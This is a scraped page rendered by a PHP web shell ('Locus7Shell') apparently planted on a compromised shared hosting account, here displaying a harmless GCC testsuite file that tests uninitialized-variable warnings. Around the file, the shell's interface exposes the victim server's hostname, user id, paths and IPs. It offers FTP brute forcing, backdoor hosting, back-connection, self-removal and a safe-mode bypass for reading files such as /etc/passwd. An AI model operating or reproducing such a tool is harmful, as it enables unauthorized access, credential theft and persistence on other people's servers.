Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     uninit-33.c (2.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR middle-end/10138 - warn for uninitialized arrays passed as const*
   arguments
   Verify that passing pointers to uninitialized objects to arguments
   to functions declared with attribute access is diagnosed where expected.
   { dg-do compile }
   { dg-options "-O -Wall" } */

#define RO(...) __attribute__ ((access (read_only, __VA_ARGS__)))
#define RW(...) __attribute__ ((access (read_write, __VA_ARGS__)))
#define WO(...) __attribute__ ((access (write_only, __VA_ARGS__)))

RO (1) void fpri (int*);      // { dg-message "in a call to 'fpri' declared with attribute 'access \\\(read_only, 1\\\)' here" }

RO (1) void fpcri (const int*);

RO (1, 2) void fpcri1_2 (const int*, int);


void warn_scalar_fpri (void)
{
  int i;                      // { dg-message "declared here" }
  fpri (&i);                  // { dg-warning "'i' is used uninitialized" }
}

void nowarn_scalar_plus_fpri (void)
{
  int i;
  /* This gets a -Wstringop-overflow for reading past the end but not
     -Wuninitialized because there's nothing to initialize there.  */
  fpri (&i + 1);              // { dg-warning "\\\[-Wstringop-overread" }
}

void nowarn_array_assign_fpcri (void)
{
  int a[2];
  a[0] = 0;
  fpcri (a);
}

void nowarn_array_init_fpcri (void)
{
  int a[4] = { 0 };
  fpcri (a);
}

void nowarn_array_compound_fpri (void)
{
  fpri ((int[2]){ 0 });
}

void nowarn_array_compound_fpcri (void)
{
  fpcri ((int[3]){ 1 });
}

void warn_scalar_fpcri (void)
{
  int i;
  fpcri (&i);                 // { dg-warning "\\\[-Wuninitialized" }
}

void warn_array_fpcri (void)
{
  int a[4];
  fpcri (a);                  // { dg-warning "\\\[-Wuninitialized" }
}

void warn_array_plus_cst_fpcri (void)
{
  int a[4];
  fpcri (a + 1);              // { dg-warning "\\\[-Wuninitialized" }
}

void warn_array_plus_var_fpcri (int i)
{
  int a[4];
  fpcri (a + i);              // { dg-warning "\\\[-Wuninitialized" }
}

void nowarn_struct_assign_fpcri (void)
{
  struct { int a, b; } s;
  s.a = 0;
  fpcri (&s.a);
}

void warn_struct_assign_fpcri (void)
{
  struct { int a, b; } s;
  s.a = 0;
  fpcri (&s.b);               // { dg-warning "\\\[-Wuninitialized" }
}

void nowarn_struct_init_fpcri (void)
{
  struct { int a, b; } s = { 0 };
  fpcri (&s.a);
  fpcri (&s.b);
}

void nowarn_struct_compound_fpcri (void)
{
  struct S { int a, b; };
  fpcri (&(struct S){ }.a);
  fpcri (&(struct S){ }.b);
}


void nowarn_scalar_fpcri1_2 (void)
{
  int i;
  fpcri1_2 (&i, 0);
}

void nowarn_array_assign_fpcri1_2 (void)
{
  int a[2];
  a[0] = 0;
  fpcri1_2 (a, 1);
}

void nowarn_array_assign_fpcri1_2_plus_cst (void)
{
  int a[3];
  a[1] = 0;
  fpcri1_2 (a + 1, 1);
}

void nowarn_array_init_fpcri1_2 (void)
{
  int a[4] = { 0 };
  fpcri1_2 (a, 2);
}

void warn_array_fpcri1_2_rd1 (void)
{
  int a[4];
  fpcri1_2 (a, 1);            // { dg-warning "\\\[-Wuninitialized" }
}

void warn_array_fpcri1_2_rd2 (void)
{
  int a[4];
  fpcri1_2 (a, 2);            // { dg-warning "\\\[-Wuninitialized" }
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0065 ]--